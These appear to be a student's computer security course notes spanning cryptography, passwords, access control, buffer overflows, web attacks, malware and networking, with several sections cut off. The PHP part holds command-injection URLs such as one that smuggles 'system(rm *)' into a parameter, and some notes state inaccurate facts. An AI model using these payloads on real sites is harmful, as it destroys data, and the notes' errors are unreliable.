Académique Documents
Professionnel Documents
Culture Documents
States that a crypto system must be secure even if everything about the system,
except the key, is public knowledge
Adversary knows the specification of Kg, Enc, and Dec
No security by obscurity! (hidden specifications of encryption scheme still common in
industrial settings though)
A secure encryption scheme should hide all possible partial information and the
plaintext(s), since what is useful is usage-dependent
Common Attack Settings
Unknown plaintext attack: attacker only sees ciphertexts
Known plaintext attack: attacker knows additionally some plaintext-ciphertext pair
Chosen plaintext attack: attacker can arbitrarily choose what the plaintext are
Semantic Security
Semantic security is achieved when the encryption reveals nothing about the
plaintext, not even whether the same message was encrypted earlier
Every time we encrypt, the cipher text looks random to a computationally
bounded adversary. To ensure this, encryption must use randomization (many
possible ciphertexts for same message)
Masking
If we bitwise-xor a random string K to any string X, the outcome C = X XOR K is
random and independent of the original X, and thus hides everything about X (*the
probability of every possible K is exactly 1/(2^n))
Symmetric Cryptography
Symmetric cryptography considers the setting where the sender and the receiver
share the same secret key, and want to communicate securely in presence of an
adversary
Key generation algorithm (Kg), takes no input and outputs a (random) secret
key K
Encryption algorithm (Enc), takes input the key K and the plaintext M, outputs
ciphertext C <- Enc(K,M)
Decryption algorithm (Dec), is such that: Dec(K, Enc(K,M)) = M
Mono-Alphabetic Substitution Ciphers
Key Generation: Random one-to-one mapping of each character {A,B,...,Z} ->
{A,B,...,Z}
One-to-one mapping isnt very secure because it preserves the frequencies of each
letter in the text
Block Ciphers
A block cipher is a substitution cipher where the plaintext is made of blocks from a
very large alphabet, but with a very compact
Blocks are n-bit strings
There are (2^128)! permutations over 128-bit strings
Two examples of constructing block ciphers are DES and AES
Data Encryption Standard (DES)
(1) Split 64-bit input into L0, R0 of 32 bits each (2) Repeat round 16 times
(3) Each round applies function F using separate round keys K1...K16
derived from main key
Essentially broken (use 3DES which expands keyspace to 118 bits)
Advanced Encryption Standard (AES)
For k = 128 uses 10 rounds of permute and XOR in a round key derived
from K
Current block cipher standard
Pseudorandom permutation (PRP): a block cipher (e.g., AES) under a random secret
key behaves as an ideal substitution cipher with n-bit alphabet (security goal)
As long as the adversary does not learn the key, outputs on dierent inputs look
like random and independent strings
Problem: Two identical 16-byte sequences are still going to be encrypted in the same
way. As such, it is still back at encrypting images because it keeps similar patterns still.
Counter Mode Encryption (CTR)
Algorithm Enc(K,M):
Split M in blocks M[1],,M[r] *all blocks except possibly M[r] are n-bits
Picks random IV = {0,1}^n
C[0] <- IV
for i in range(1,r+1) do
P[i] <- Ek(IV + i)
C[i] <- M[i] XOR P[i]
return C[0],C[1],,C[r]
Note: If M[r] shorter than n bits, then also shorten P[r] as necessary
Masking strings, P[1],,P[r] generated upon each encryption will come from disjoint
parts of the block cipher domain (with high probability), and thus look random and
independent
Every encryption adds a new, independent mask to the plaintext, and thus (by our
previously established fact about masking) every ciphertext looks like a fresh random
string
Ciphertext Block Chaining (CBC)
channel
Encrypt-then-MAC (EtM) is the best option (consists of two keys: one for Enc, one for
MAC)
Decryption: Given C* = C || T first check T valid tag for C using K'
If so, decrypt C, and output result
If not, output error"
EtM is secure as long as the encryption scheme is semantically secure, and
MAC is unforgeable
Integrity: If the attacker sees C* = (C,T), and wants to change this to a valid C** =
(C', T') where C' != C, then it needs to forge the MAC (i.e. produce a new tag T'
for C')
Confidentiality: C* = C || T does not leak more information about plaintext than
C, because T is computed from C directly, and does not add extra information
about plaintext
MAC-then-Encrypt (MtE) is a bad option because you must decrypt the ciphertext
every time before checking for authentication
Susceptible to padding-oracle attack
MtE is semantically secure but doesnt ensure integrity
If encrypting everything with a semantically secure encryption scheme,
then no information about the plaintext (and the tag) is leaked
Doesnt ensure ciphertext integrity because we are able to produce a
ciphertext dierent than the one we have seen, which is still valid
Ensures plaintext security, because even if we can create a new valid
ciphertext, it still decrypts to the same message M
Encrypt-and-MAC (E&M) is a bad option because T is computed directly from M,
which may reveal information about the original plaintext. Identical messages will map
to the same MAC so the adversary can just look at the first few blocks and guess
information about similar previous books to start cracking the plaintext. Thus, you can
mount a chosen-plaintext attack.
E&M is not semantically secure and doesnt ensure integrity
MAC part of the ciphertext depends deterministically on a message,
meaning the tag doesnt change if you re-encrypt the same message
twice
Doesnt ensure ciphertext integrity because we are able to produce a
ciphertext dierent than the one we have seen, which is still valid
Ensures plaintext security, because even if we can create a new valid
ciphertext, it still decrypts to the same message M
Common solution is GCM which is essentially CTR-mode + a very lightweight MAC
(widely used in TLS, Wgig, SSH, )
WEP
Wired Equivalent Privacy is authenticated encryption used to protect wireless
communications in original IEEE 802.11 Wifi standard
Subject to a number of flaws, allow gaining access/decrypting trac within minutes
Padding-Oracle Attacks
Works on CBC (if not using authenticated encryption)
Utilize PKCS #7 Padding for CBC padding technique
Looks at how many bytes are missing and fills remaining k bytes with that value
k
The attack relies on having a "padding oracle" who freely responds to queries about
whether a message is correctly padded or not
Utilized calculations:
C XOR M = P (use this to find P, hit padding oracle with C until you can assume
the value of M)
C XOR P = M
Solutions:
BAD: Use CTR
BAD: Try not to leaking padding-oracles
GOOD: Use authenticated encryption
Public-Key Encryption Scheme
A public-key encryption scheme consists of three algorithms Kg, Enc, and Dec
Kg takes no input and outputs a random public-key/secret-key pair (PK, SK)
Enc takes input the public key PK and the plaintext M, outputs ciphertext C <Enc(PK, M)
Dec is such that Dec(SK, Enc(PK,M)) = M
Public Key (PK) is known to everyone but the Secret Key (SK) is only known to the
receiver
RSA Encryption
RSA Setup
p and q can be large prime numbers (e.g. around 2^2048 *referred to as 2048bit primes)
N = pq called the modulus
Z_n* = {i | gcd(i,N) = 1} *consists of all integers i such that the gcd is equal to 1
gcd(i,N) is the greatest common divisor
Z_n* is closed under multiplication
Online Attacks
Trying multiple passwords on the server
Online attacks are easy to mitigate because the # of trials/username/unit of time
can be reduced
Prevent leaking valid usernames via generic error messages
Oine Attacks
If a password file has been stolen then the adversary can conduct an oine attack
Oine attacks are the most common attack scenario
Attacker can compute as much as he or she wishes
Password Hashing
Password hashes are stored in password files instead of the true value of the
password
Hashing functions include MD5, SHA-256, etc.
Upon receiving a password for a user, the server checks whether entry user: H(pass)
exists in passwd file
Problem: If two users use the same password and the adversary gains access to one
password, it will have found the other. Salting must be used to fight against this. If this
isnt used then rainbow tables can be used to crack passwords
The original UNIX DES-based password hashes use the first two characters as the salt.
It supports 8-char passwords and 2-char salts.
glibc password hashes (better)
Comes in the form: $hash_algo_num$salt$hash
The hash_algo_num can be: 1 = MD5, 5 = SHA-256, 6, SHA-512
Salt comes from [a-zA-Z0-9./], and hash is encoded with these characters too
(base 64)
SHA-256 is slower (good thing) than SHA-512. Both are better than MD5
Brute-Force Attack
Try all possible passwords in increasing length, and check if the hash matches
We can slow down a brute-force attack by making computation of hash functions more
costly. Iteration aka key-stretching can make computer of a password hashes c times
slower by making it iterate through c times
Dictionary Attacks
Attempt common passwords according to some dictionary, in decreasing frequency
of likelihood
Best attacks are a clever combination of dictionaries, brute force, and manipulations of
words in dictionary according to rules
Salting
Every time a new password is added to a password file, computer a random string
called the salt
You append this salt to the final hash in the password file
Password Files
In UNIX-based systems, passwords are stored in the /etc/shadow file
/etc/passwd and /etc/shadow are usually similar, but the actual password hash is
stored only in the latter
Multifactor Authentication
Combining multiple authentication methods for stronger security (ex. gmails multifactor authentication)
Password-based Cryptography
Using password instead of secret keys making it easy to memorize and avoids
expensive secure storage of keys
Password-based Key Derivation (PBKDF) is used with symmetric encryption in order
to create password-based encryption
Multi-User Systems
In general, multiple users may authenticate to access a system and they may share
resources
There needs to be multiple levels of security for this system to limit what certain users
can do over others. This is where security policies come in
Security Policies
A security policy is a statement that partitions the states of the system into a set of
authorized (or secure) states and a set of unauthorized (or non-secure) states
A secure system is a system that starts in an authorized state and cannot enter an
unauthorized state
These policies involve:
Subjects: people, users, employees, ...
Objects: files, documents, physical locations, ...
Actions: read, write, open, edit, append, ...
Mandatory Access Control (MAC)
Security decisions are made by a central policy administrator (ex. Bell-LaPadula)
Reference monitors and security kernels are system components that monitors
accesses to data for security violations. These may be kernel, hypervisor, within
applications (Apache)
It is essentially impossible to implement a good system wide MAC because implicit
covert channels allow bypassing
Discretionary Access Control (DAC)
Users decide access to their own files
There are two common implementation paradigms
Access control lists: column store with file (UNIX)
ACLs requires authenticating user
Processes must be given permissions
Reference monitor must protect permissions setting
Delegation: process run by user inherits users permissions
Revocation: remove user from list
Capabilities: row stored for each user (Amoeba, Eros)
Token-based approach avoids need for authentication
Tokens can be passed around
Reference monitor must manage tokens
Delegation: process can pass around token
Revocation: N/A (kinda dicult)
Holds (static) part of local storage and keeps data that doesnt fit into registers
Grows from high to low addresses
Within a function, lowest part of the stack (stack frame) is assigned to that function
%ebp (base pointer) stores top of current stack frame"
%esp (stack pointer) stores bottom of stack frame"
Code that does this is said to smash the stack, and can cause return from the routine
to jump to a random address
Munging EBP is when function() returns and stack corrupted because stack
frame pointed to wrong address
Munging EIP is when function() returns and jumps to address pointed to by the
EIP value saved on the stack (i.e. control-flow hijacking)
AT&T Instructions
Instruction ends with data length
Format is: opcode, src, dst
Constants preceded by $
Registers preceded by %
Register Instructions
subl: subtract from a register value
Frame Instructions
libc is the standard C library, included in all processes, which exists on the heap. All
libc functions are marked executable at fixed addresses
system() - executes commands on the system
Overwrite EIP with address of system() function
junk2 just some filler returned to after system call
First argument to system() is ptr to /bin/sh"
We know where /bin/sh is by setting an environment variable
Countermeasures include:
Requiring to pass first argument in %eax
ASCII armoring: making sure that libraries are at addresses that contain NULL
bytes
Address Space Layout Randomization (ASLR)
A memory-protection process for operating systems that guards against bueroverflow attacks by randomizing the location where system executables are loaded
into memory
More eective for 64-bit architectures
Still susceptible to:
If W^X not on, a large nop-sled with classic buer overflow
Brute force attacks on address
Vulnerabilities used to leak address information (e.g., printf arbitrary read)
Stack Canaries
We can protect the return address from being overwritten by placing canary values on
the stack. At the end of the function, we check that the canary value is correct, if not,
fail safe
Canary value can be:
Random value (choose once for whole process), must be hidden well
NULL bytes/EOF/etc. (string functions wont copy past canary)
You can activate stack canaries in gcc with -fstack-protector and -fstack-protectorstrong. You can also deactivate with -fno-stack-protector
Stack Guard and ProPolice are more modern stack protection techniques. For
example, ProPolice also makes sure that on-stack pointers are put on lower addresses
than buers
HTTP Basics
Browser Execution
Retrieve/load content
Render it by processing the HTML
Might run scripts, fetch more content, etc.
Respond to events
User actions: OnClick, OnMouseover
Rendering: OnLoad, OnBeforeUnload
Timing: setTimeout(), clearTimeout()
HTTP Cookies
Main mechanism to keep state across HTTP requests
Session cookies are valid until browser is closed
Persistent cookies are valid until an expiration date
Secure cookies are only sent over HTTPS connection
HttpOnly cookies are not visible by client side script language (like JavaScript)
Setting a cookie
Set a cookie with information in HTTP Header
Default scope of a cookie is the domain and path of setting URL
If previous cookie with same name, domain, and path then it is overwritten
Set a cookie dynamically server-side or client-side
Deleting a cookie
Set cookies expire date to the past
Browsers send all cookies such that:
Domains cope is a sux of url-domain
Path is prefix of its url-path
Protocol is HTTPS if cookies marked secure"
Security Issues
No integrity
HTTPS cookies can be overwritten by HTTP cookies
Malicious clients can modify cookies
Scoping rules can be abused
blog.example.com can read/set cookies for example.com
Privacy
Cookies can be used to track you around the Internet
Susceptible to session hijacking if HTTP cookies sent in clear
Session Hijacking
The exploitation of a valid computer session - sometimes also called a session key - to
gain unauthorized access to information or services in a computer system
Unencrypted contents are very easy to retrieve, as such, use encryption when setting
session cookies
SessID = Enc(K, info) where K is server-side secret key and info contains user id,
expiration time, and other data
This doesnt prevent Firesheep hijacking so turn on HTTPS always
PHP Vulnerabilities
PHP command eval(cmd_str) executes string cmd_str as PHP code
//calc.php
$in = $_GET[exp];
eval($ans = .$in.;);
http://example.com/calc.php?exp=11;system(rm *)"
//sendmail.php
$email = $_POST[email]
$subject = $_POST[subject]
system(mail $email -s $subject < /tmp/joinmynetwork)
http://example.com/sendmail.php?
email=abouttogetowned@ownage.com&subject=food</usr/passwd;ls"
File handling: example.com/file_handle.php?i=file.html
Global variables: example.com/globl_var.php?user=bob;$auth=1;"
Web Vulnerabilities
SQL injection inserts malicious SQL commands to read/modify a database
Cross-site Request Forgery (CSRF) in which Site A uses credentials for Site B to do
a bad thing
Cross-site Scripting (XSS) in which Site A sends victim client a script that abuses
honest Site B
SQL Injection
set ok = execute(SELECT * FROM Users
WHERE user= & form(user) & "'
AND pwd= & form(pwd) & ');
if not ok.EOF
login success
else fail;
Malware
Malicious code installed by a victim user that:
Fulfills malicious intent of author
Performs some unwanted activity on your system
Phishing means tricking the user into downloading malware, submitting CC or account
info to attacker, etc.
Malware is so prevalent today because data and code are mixed, a homogenous
computing base, unprecedented connectivity, a clueless user base, and it has become
profitable
A boot sector infector is a computer virus that infects boot section, and is executed
every time disk is accessed/boot sector is loaded (e.g., elk cloner)
The boot sector is part of disk used to bootstrap the system or mount a disk.
Code in BS is executed when system sees disk for the first time
An executable infector is a virus that infects executable programs. The virus code is
appended or prepended to executable code and data (e.g., chernobyl virus)
Stealth viruses cancel infection of files. For example, they intercept requests to
infected files, and make them look normal (e.g., 4096, IDF virus)
Stealth feature requires running the infected executable, virus may be detectable
as long as it is not executed once
To prevent detection from anti-virus software, an encrypted virus will encrypt the virus
code with a fresh cryptography key at every encryption, and decrypt at run-time before
executing
Because deception procedures dont change, only the encrypted portion and key:
a polymorphic virus changes every time it is inserted into another program
Inserts bogus random instructions with not eect on a actual which change
every time the virus infects a new program. These actions may include dead
code insertion, instruction reordering, or instruction substitution
Macro viruses use macro-scripting languages in application documents
Trojans
Milder forms of viruses that usually not self-replicating
They act as a useful server but carry out malicious behavior, typically opening a
backdoor to the system (e.g., SMS.AndroidOS.Stealer.a, banking trojans)
Computer Worms
A program that copies itself from one computer to another (e.g., Morris worm)
Botnets
A network of private computers infected with malicious software and controlled as a
group without the owners knowledge
Usage: spam, DDoS, SEO, trac generation, etc.
Can make money through: rental, DDoS extortion, bulk trac selling, click fraud, theft
of monetizable data, data ransom, product advertisement, etc.
Well-known botnets include Agorot (2002) and Storm Botnet (2007)
Anti-Virus Software
Helps you detect viruses on your computer
Signature-based detection compare machine-code with DB of known viruses
Heuristic-based detection looks for typical virus-like machine code
WiFi
Most common way to connect to a network
Implements IEEE 802.11 standards, a family of standards with dierent
bandwidth/throughput/frequencies
Protocol coordinates access to channels to avoid collisions
Logical units identified through so-called SSIDs (this is what you see when
connecting to a network
Every signal can easily be captured through packing sning. A WiFi device can often
be put into monitor mode such that it sees every packet sent over a WiFi channel
The solution to this WPA2
WPA2-PSK
Device and access points share pre-shared secret PSK (aka PMK, pairwise master
key), derived from a passphrase and SSID
Upon connect, 4-way handshake protocol generates temporary session key PTK
to deal with this, figuring out MTU of next link and fragmenting packets if necessary
into smaller chunks
Fragmentation attacks:
Ping of death: allows sending 65,536 byte packet overflowing buer
This is because max oset is 65528 but we can now actually still include
more data that goes beyond the end of the buer
Teardrop DoS: mangled fragmentation crashes reconstruction code (sets
osets so that two packets have overlapping data)
Prevent spoofing:
Use authentication based on key exchange between the machines on your
network; something like IPsec will significantly cut down on the risk of spoofing
Use an access control list to deny private IP addresses on your downstream
interface
Implement filtering of both inbound and outbound trac
Configure your routers and switches if they support such configuration, to reject
packets originating from outside your local network that claim to originate from
within
Enable encryption sessions on your router so that trusted hosts that are outside
your network can securely communicate with your local hosts
Denial of Service (DoS) Attacks
Goal of these attacks is to prevent legitimate users from accessing victim servers
ICMP ping flood achieves this by sending ICMP pings so fast that the victims
resources are overwhelmed
An ICMP echo message must be responded with echo reply containing the
exact data received in the request message
To avoid ingress filtering: an attacker can send packet with a fake source IP so
the packet will get routed correctly, but the replies will not
DoS reflection attacks bounce attacks o another server
DoS works better when there is asymmetry between victim and attack. This way
an attacker uses few resources to cause victim to consume a lot of resources
BCP 38
Upstream ingress filtering to drop spoofed packets
Before forwarding on packets, check at ingress that source IP is legitimate
Doesnt stop DoS attacks because:
Requires widespread adoption and compliance
More and more DoS-attacks do not use spoofing but instead Botnets and
Distributed DoS attacks (DDoS)
TCP (Transfer Control Protocol)
Connection-oriented: state initialized during handshake and maintained
A root name server is a name server for the root zone of the DNS of the Internet
It directly answers requests for records in the root zone and answers other
requests by returning a list of the authoritative name servers for the appropriate
top-level domain (TLD)
DNS cache poisoning is when an attacker utilizes a DNS server using a predictable
UDP port to redirect trac meant for one place to another by abusing the victims DNS
server
You flood the victim name server with forged answers, guessing the QID, until
one of them hits correct in which the victim is routed to a malicious site
You can also poison cache for NS record instead and take over all of the second
level domain
Defenses against DNS cache poisoning include:
Randomizing UDP ports (e.g., Dan Bernsteins DJBDNS)
Randomizing QIDs (there are 65,536 possible ones)
DNSec: cryptographically sign DNS responses and verify via chain of trust from
roots down
Classless Inter-Domain Routing (CIDR) Addressing
128.168.0.0/24
a.b.c.d/x
Terrible idea because the random r completely hides the message. We can
recover m r given d but we have no means of removing the randomness r to
recover m
Is MAC(M) = SHA-256(M) XOR K a good idea?
(M,T) = (M, MAC(M)) = (M, SHA-256(M) XOR K)
Easy to recover K = T XOR SHA-256(M)
Is replacing password hashing with symmetric encryption a good idea?
No because if you find the secret key you get access to all the passwords
Explain how a DNS cache poisoning attack works
Attacker takes advantage of a DNS server using a predictable UDP port
You can flood the victim name server with forged answers, guessing the QID,
until one of them hits correct in which the victim is routed to a malicious site
FALSE: It is impossible to see the contents of a digital certificate without knowing the
CAs secret (signing) key
It is possible to see the contents of a digital certificate with the verification key
TRUE: Counter-mode encryption using AES is semantically secure, assuming AES is a
pseudorandom permutation/function
FALSE: Mono-alphabetic substitution ciphers are insecure under an unknown-plaintext
attack, but remain secure under known-plaintext attacks
Mono-alphabetic substitution ciphers are not secure under known-plaintext
attacks because you can still use frequency analysis to find the key
FALSE: Zero-day exploits can be found on the NVD webpage
It wouldnt be a zero-day exploit if it can be found on the NVD webpage, it is a
vulnerability that is unknown to the vendor
FALSE: DES is more secure than AES
The DES keyspace is too small so it is less secure than AES
TRUE: Counter-mode encryption never guarantees integrity
TRUE: EtM is a better solution than MtE
FALSE: Every TLS certificate is issued by a root certification authority
Certificates are issued by Issuing CAs
TRUE: Multi-factor authentication is preferable over single-factor authentication
TRUE: SHA-512 is much slower than MD5
Tools
Confidentiality
Integrity
Message authentication
code
Public-key certificate
Public-key encryption
Backup system
Password-based login
Mandatory access
control
Availability